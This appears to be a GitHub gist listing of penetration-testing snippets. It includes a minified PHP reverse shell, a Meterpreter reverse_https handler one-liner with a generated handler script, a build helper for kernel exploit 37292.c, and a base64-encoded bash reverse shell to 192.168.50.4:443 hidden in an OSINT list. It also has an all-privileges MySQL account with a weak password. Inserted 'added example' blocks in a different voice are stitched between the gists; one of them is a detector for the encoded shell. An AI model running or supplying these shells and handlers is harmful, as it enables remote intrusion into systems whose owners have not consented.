
@tanaka-geek
tanaka-geek / windows-reverse-shell.php
Last active June 13, 2021 13:19
windows reverse shell
//<?php class Sh{private $a=null;private $p=null;private $os=null;private $sh=null;private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $b=1024;private $c=0;private $e=false;public function __construct($a,$p){$this->a=$a;$this->p=$p;}private function det(){$d=true;if(stripos(PHP_OS,'LINUX')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}private function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo
@tanaka-geek
tanaka-geek / metasploit.md
Last active March 26, 2022 16:34
metasploit cheat sheet

You can run msfconsole without any hassle as a single one-liner:

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.1; set LPORT 443; run"

Run the Meterpreter session in background mode.
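The same handler as a resource script, as an added example that is not part of the gist: the one-liner above is typed once and lost, and a typo in LHOST or LPORT only shows up when the handler is already up. The function below validates both, writes a resource script you can replay with `msfconsole -r`, and sets `ExitOnSession false` plus `exploit -j -z` so the listener stays up and each incoming Meterpreter session is backgrounded instead of taking over the console. The payload name is whatever the caller passes in; nothing here touches the network.

```shell
#!/bin/sh
# Added example (not from the gist): build a Metasploit resource script for a
# multi/handler listener, validating LHOST/LPORT first, and background the job.
# Assumption: msfconsole is on PATH when you actually run the script by hand.

# is_ipv4 ADDR -> 0 if ADDR is a dotted quad with each octet in 0..255
is_ipv4() {
    _ip=$1
    printf '%s\n' "$_ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    _ifs=$IFS; IFS=.
    set -- $_ip
    IFS=$_ifs
    for _o in "$@"; do
        [ "$_o" -le 255 ] || return 1
    done
    return 0
}

# is_port N -> 0 if N is an integer in 1..65535
is_port() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_handler_rc PAYLOAD LHOST LPORT OUTFILE
# Writes the equivalent of the -x one-liner, but with ExitOnSession false and
# "exploit -j -z" so the handler keeps listening and every new session is
# backgrounded rather than grabbing the console.
gen_handler_rc() {
    _payload=$1; _lhost=$2; _lport=$3; _out=$4
    is_ipv4 "$_lhost" || { echo "bad LHOST: $_lhost" >&2; return 1; }
    is_port "$_lport" || { echo "bad LPORT: $_lport" >&2; return 1; }
    cat > "$_out" <<EOF
use exploit/multi/handler
set PAYLOAD $_payload
set LHOST $_lhost
set LPORT $_lport
set ExitOnSession false
exploit -j -z
EOF
}

# Usage (run by hand, not by any test):
#   gen_handler_rc windows/x64/meterpreter/reverse_https 192.168.1.1 443 handler.rc
#   sudo msfconsole -q -r handler.rc
```

Once the job is running, `sessions -l` lists the backgrounded sessions and `sessions -i N` attaches to one; `jobs -K` tears the handler down.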

@tanaka-geek
tanaka-geek / string.txt
Last active May 27, 2021 05:45
4CTF cute strings
common = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
digits = '0123456789'
hexdigits = '0123456789abcdefABCDEF'
octdigits = '01234567'
printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
punctuation = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
whitespace = ' \t\n\r\x0b\x0c'
@tanaka-geek
tanaka-geek / mysql.sql
Last active May 27, 2021 06:39
Create a new account and set up database/tables
-- start a client as root first: mysql -u'root'
-- '%' accepts connections from any host and ALL PRIVILEGES ON *.* is root-equivalent: fine for a throwaway lab box, not for anything reachable
CREATE USER 'adminer'@'%' IDENTIFIED BY 'Passw0rd!';
GRANT ALL PRIVILEGES ON *.* TO 'adminer'@'%';
FLUSH PRIVILEGES;
create database adminer;
use adminer;
create table experiment(name varchar(255));
exit;
-- LOAD DATA LOCAL INFILE needs mysqli.allow_local_infile = 1 on the PHP side (and local_infile = ON on the server); otherwise it cannot read local files
@tanaka-geek
tanaka-geek / compilers.md
Last active August 2, 2021 11:58
Different Compilers

Type of compiler

In the kernel-exploitation stage the compiler does matter.

The exploit has to be compiled to run, and the target can only execute what its own compiler is able to build.

Some lines in the kernel exploit 37292.c need changing to build with clang instead of gcc.
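An added example, not from the gist, of the check that follows from this: find out which compilers the target actually has and build with the first one that both exists and accepts the source, instead of assuming gcc. A compiler that is present but rejects the file (clang choking on a gcc-ism, or the reverse) is skipped rather than aborting the build. The compiler list, the CFLAGS value and the output path in the usage comment are illustrative assumptions; 37292.c is the file named above.

```shell
#!/bin/sh
# Added example (not part of the gist): try a list of compilers in order and
# build a single C file with the first one that exists and compiles it.
# Assumption: extra flags come in via CFLAGS; the compiler names are the
# caller's choice.

# pick_cc NAME... -> prints the path of the first compiler found on PATH
pick_cc() {
    for _cc in "$@"; do
        _path=$(command -v "$_cc" 2>/dev/null) || continue
        echo "$_path"
        return 0
    done
    return 1
}

# build_with_fallback SRC OUT NAME... -> compiles SRC to OUT, trying each
# compiler in turn; prints the name of the one that worked.
build_with_fallback() {
    _src=$1; _out=$2; shift 2
    for _cc in "$@"; do
        _path=$(command -v "$_cc" 2>/dev/null) || continue
        rm -f "$_out"
        # a compiler that exists but fails on this source is just skipped
        if "$_path" $CFLAGS -o "$_out" "$_src" >/dev/null 2>&1 && [ -f "$_out" ]; then
            echo "$_cc"
            return 0
        fi
    done
    echo "no usable compiler among: $*" >&2
    return 1
}

# Usage on a target (run by hand; output path and flags are assumptions):
#   CFLAGS="-static -w" build_with_fallback 37292.c /tmp/ofs gcc cc clang tcc
```

`-static` is worth trying first on a target whose libc differs from your build box; drop it if the chosen compiler lacks static libs.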

@tanaka-geek
tanaka-geek / reverse-python.md
Created May 5, 2021 09:08
reversing python

Python has an even looser definition of compiling, but it still has a compiled layer in the form of Python bytecode stored in ".pyc" files.

These pyc files tend to be much easier to reverse than Java or C# binaries, so unless the source has been obfuscated you can almost always recover source code that is near-identical to what produced the final executable (comments and formatting are the main things lost).

$ file byte-compiled-program
byte-compiled-program: python 2.7 byte-compiled

$ python -i byte-compiled-program
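What `file` is reading there is the 2-byte magic at the start of the pyc, and that magic is the first thing to check before picking an interpreter or decompiler: a pyc only loads under the CPython version that wrote it. Below is an added example, not from the gist, that reads the magic with `od` and maps it to a version. The table is CPython's own (the MAGIC_NUMBER values in importlib/_bootstrap_external.py); only a handful of releases are listed and anything else reports unknown.

```shell
#!/bin/sh
# Added example (not from the gist): identify the CPython version that wrote
# a .pyc from its 2-byte magic. Assumption: GNU/BSD od is available.

# pyc_magic FILE -> prints the first two bytes as lowercase hex, e.g. "03f3"
pyc_magic() {
    od -An -tx1 -N2 "$1" | tr -d ' \n'
}

# pyc_version FILE -> prints the CPython version for the magic, or "unknown"
# (magic is little-endian: 2.7 is 62211 = 0xf303, 3.8 is 3413 = 0x0d55, ...)
pyc_version() {
    case "$(pyc_magic "$1")" in
        03f3) echo 2.7 ;;
        330d) echo 3.6 ;;
        420d) echo 3.7 ;;
        550d) echo 3.8 ;;
        610d) echo 3.9 ;;
        6f0d) echo 3.10 ;;
        a70d) echo 3.11 ;;
        cb0d) echo 3.12 ;;
        *)    echo unknown ;;
    esac
}

# pyc_is_valid FILE -> 0 if bytes 3-4 are "\r\n", the terminator CPython puts
# after the magic; a file mangled by a text-mode transfer fails this early
pyc_is_valid() {
    [ "$(od -An -tx1 -j2 -N2 "$1" | tr -d ' \n')" = "0d0a" ]
}

# Usage (run by hand):
#   pyc_version byte-compiled-program   # prints 2.7 for the file shown above
```

A mismatch between the version reported here and the interpreter you run `python -i` with is the usual reason a pyc refuses to load ("Bad magic number").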
@tanaka-geek
tanaka-geek / OSINT.txt
Last active May 4, 2021 12:12
Oh So Intelligence!
# Tools
whois.com
socialmention.com
recon-ng (Kali Linux tool)
theharvester (Kali Linux tool)
Shodan search engine
Netcraft
# Dark Web Sites:
http://onion.city/
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjQvNDQzIDA+JjE= | base64 -d | bash
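That last line decodes to `bash -i >& /dev/tcp/192.168.50.4/443 0>&1`, a bash reverse shell hidden behind base64 so the plaintext never appears in the command line. From the detection side, the pattern "decode base64 and pipe it into a shell" is what to hunt for; the decoded payload then tells you whether it opened a socket. The following is an added example, not from the gist: it classifies command lines, decodes the blob, and flags `/dev/tcp` or `/dev/udp` use. The sample lines in the usage comment and test are constructed; a real feed would be auditd EXECVE records, shell history or EDR process telemetry.

```shell
#!/bin/sh
# Added example (not from the gist): detect "echo <b64> | base64 -d | sh"
# style command lines and decode the payload to look for /dev/tcp sockets.
# Assumption: a base64 binary that accepts -d is on PATH (GNU coreutils).

# extract_b64 LINE -> prints the blob in 'echo <blob> | base64 -d'
extract_b64() {
    printf '%s\n' "$1" | sed -E -n \
        's#.*echo[[:space:]]+([A-Za-z0-9+/=]+)[[:space:]]*\|[[:space:]]*base64[[:space:]]+(-[dD]|--decode).*#\1#p'
}

# is_decode_to_shell LINE -> 0 if base64 -d output is piped into a shell
is_decode_to_shell() {
    printf '%s\n' "$1" | grep -Eq \
        'base64[[:space:]]+(-[dD]|--decode)[[:space:]]*\|[[:space:]]*(ba|z|da|k)?sh([[:space:]]|$)'
}

# decoded_payload LINE -> prints the decoded command, or nothing
decoded_payload() {
    _b=$(extract_b64 "$1")
    [ -n "$_b" ] || return 1
    printf '%s\n' "$_b" | base64 -d 2>/dev/null
}

# classify LINE -> REVERSE_SHELL, DECODE_TO_SHELL or CLEAN
classify() {
    if is_decode_to_shell "$1"; then
        if decoded_payload "$1" | grep -Eq '/dev/(tcp|udp)/'; then
            echo REVERSE_SHELL
        else
            echo DECODE_TO_SHELL
        fi
    else
        echo CLEAN
    fi
}

# scan_lines < input -> one "VERDICT<TAB>line" per input line
scan_lines() {
    while IFS= read -r _line; do
        printf '%s\t%s\n' "$(classify "$_line")" "$_line"
    done
}

# Usage (constructed sample; run by hand):
#   printf '%s\n' 'echo aWQ= | base64 -d | sh' 'ls -la /tmp' | scan_lines
```

The decode step matters for triage: `DECODE_TO_SHELL` alone is common in installers and CI scripts, while a decoded payload that touches `/dev/tcp` is almost never legitimate.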
@tanaka-geek
tanaka-geek / enumerate.sh
Last active May 14, 2021 06:05
file descriptor exposure via FTP and Netcat : site command has to be enabled
#!/bin/bash
IP="192.168.1.1"
PORT=21
USER="anonymous"
PASSWD="whatever"
FTP_DIR="/home/ftp"
function Enumerate {
for i in `seq 1 16`;do # widen the seq range if more services are running, but it is usually fewer than 16
@tanaka-geek
tanaka-geek / linux-101.md
Last active May 27, 2021 07:06
Linux Directory Structure 101

/etc/group

user groups

/etc/host.conf

configuration file for resolver

/etc/resolv.conf